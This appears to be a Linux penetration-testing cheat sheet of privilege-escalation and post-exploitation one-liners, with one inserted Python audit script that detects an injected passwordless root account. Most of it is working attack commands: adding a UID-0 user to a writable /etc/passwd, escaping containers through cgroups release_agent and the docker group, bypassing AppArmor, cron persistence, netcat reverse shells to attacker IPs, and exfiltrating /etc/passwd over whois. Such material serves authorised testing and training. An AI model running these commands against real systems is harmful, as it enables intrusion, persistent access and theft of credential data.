Linux
Adding password to writable passwd file
If /etc/passwd is writable, you can just add a passwordless root account by echoing an extra line to it, using root's UID and GID of 0.
echo brigzzy::0:0:brigzzy:/root:/bin/bash >> /etc/passwd
su - brigzzy drops you straight to root
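An added audit check (not part of the original cheat sheet) for this trick from the defender's side: it parses passwd-style content and flags a second UID-0 account, an empty password field, or a hash kept in passwd rather than shadow, and reports whether the file's mode lets non-root users write it. The function names and the sample passwd content are constructed for this example.

```python
#!/usr/bin/env python3
"""Audit /etc/passwd for an injected passwordless UID-0 account and for a
writable passwd file. Helper names are hypothetical; SAMPLE is constructed."""
import os
import stat

# Constructed sample: the third line is the injected entry from the trick above.
SAMPLE = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n"
    "brigzzy::0:0:brigzzy:/root:/bin/bash\n"
)


def audit_passwd(text):
    """Return (line_no, username, reason) findings for passwd-format text."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((n, line, "malformed entry (expected 7 fields)"))
            continue
        user, pw, uid = fields[0], fields[1], fields[2]
        if uid == "0" and user != "root":
            findings.append((n, user, "extra UID-0 (root-equivalent) account"))
        if pw == "":
            findings.append((n, user, "empty password field: login needs no password"))
        elif pw not in ("x", "*") and not pw.startswith("!"):
            findings.append((n, user, "password hash stored in passwd, not shadow"))
    return findings


def mode_writable_by_others(mode):
    """True if the group- or world-write bit is set on the given st_mode."""
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))


def passwd_writable(path="/etc/passwd"):
    """Check the real file's permission bits (ownership by root is assumed)."""
    return mode_writable_by_others(os.stat(path).st_mode)


if __name__ == "__main__":
    for line_no, user, reason in audit_passwd(SAMPLE):
        print(f"line {line_no}: {user}: {reason}")
    if os.path.exists("/etc/passwd"):
        print("/etc/passwd writable by non-root:", passwd_writable())
```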
Bash Portscanner
for p in {1..65535}; do (echo >/dev/tcp/10.0.2.3/$p) >/dev/null 2>&1 && echo "$p open"; done
Connect to an SMB Share
smbclient //192.168.99.23/Private -I 192.168.99.23 -N
Container Escape
Quick and dirty way to get out of a privileged k8s pod or docker container by using cgroups release_agent feature:
d=`dirname $(ls -x /s*/fs/c*/*/r* |head -n1)`
mkdir -p $d/w;echo 1 >$d/w/notify_on_release
t=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
touch /o; echo $t/c >$d/release_agent;echo "#!/bin/sh
$1 >$t/o" >/c;chmod +x /c;sh -c "echo 0 >$d/w/cgroup.procs";sleep 1;cat /o
Persistence on a Box via Cron
One liner to add persistence on a box via cron
echo "* * * * * /bin/nc 192.168.99.24 1234 -e /bin/bash" > cron && crontab cron
OR
echo "* * * * * mknod /tmp/backpipe p && /bin/sh 0</tmp/backpipe | nc 192.168.99.24 1234 1>/tmp/backpipe" > cron && crontab cron
and on 192.168.99.24
nc -lvp 1234
Docker Apparmor Bypass
FROM ubuntu:18.04
# get rid of procfs
VOLUME /proc
# fake files to avoid fail on run
COPY empty /proc/self/attr/exec
COPY empty /proc/self/fd/4
COPY empty /proc/self/fd/5
COPY empty /proc/self/status
# cmd will not have apparmor restrictions
CMD YOUR_CMD
Docker Container Escape
If your account is a member of the docker group, you can download the docker binary, even if it is not installed in your container or on your PATH.
From there you can run a container inside the container, mount the host's root filesystem into it, and you have root on the host.
./docker run -it -v /:/home/ ubuntu bash
Exfiltrate data with Whois
Have limited ways to exfiltrate data? Use Whois!
attacker: nc -lvp 53 | sed "s/ //g" | base64 -d
victim: whois -h $attackerIP -p 53 "$(cat /etc/passwd | base64)"
Find files with suid set
find / -perm -4000 2>/dev/null
Host quick web server to copy files (with PHP)
php -S 192.168.99.4:3000
then you can
wget http://192.168.99.4:3000/somefile.py
Netcat Portscanner
nc -zvvvn 10.0.2.5 1-65535 2>&1 | tee scan.txt
netcat reverse shell
Listener: nc -lvp 4444
Connector: nc 192.168.99.24 4444 -e /bin/bash
OR:
rm /tmp/f
mkfifo /tmp/f
cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.99.14 4444 > /tmp/f
then you can upgrade your shell like this:
python: python -c 'import pty;pty.spawn("/bin/bash")'
python3: python3 -c 'import pty; pty.spawn("/bin/bash")'
Then on either: export SHELL=bash && export TERM=screen && reset
OR:
$ which python
/usr/bin/python
$ python -c "import pty;pty.spawn('/bin/bash')"
www-data@Aogiri:/var/www/html$ ^Z
[1]+ Stopped nc -lvnp 1337
root@kali:~/Desktop/HTB/boxes/ghoul# stty raw -echo
root@kali:~/Desktop/HTB/boxes/ghoul# nc -lvnp 1337
www-data@Aogiri:/var/www/html$ export TERM=screen
www-data@Aogiri:/var/www/html$
OR (no -e support):
Listener: nc -nvlp 1234
Connector: mknod /tmp/backpipe p && /bin/sh 0</tmp/backpipe | nc 192.168.99.24 1234 1>/tmp/backpipe
Spawn Bash Shell via Python
python -c 'import pty; pty.spawn("/bin/bash")'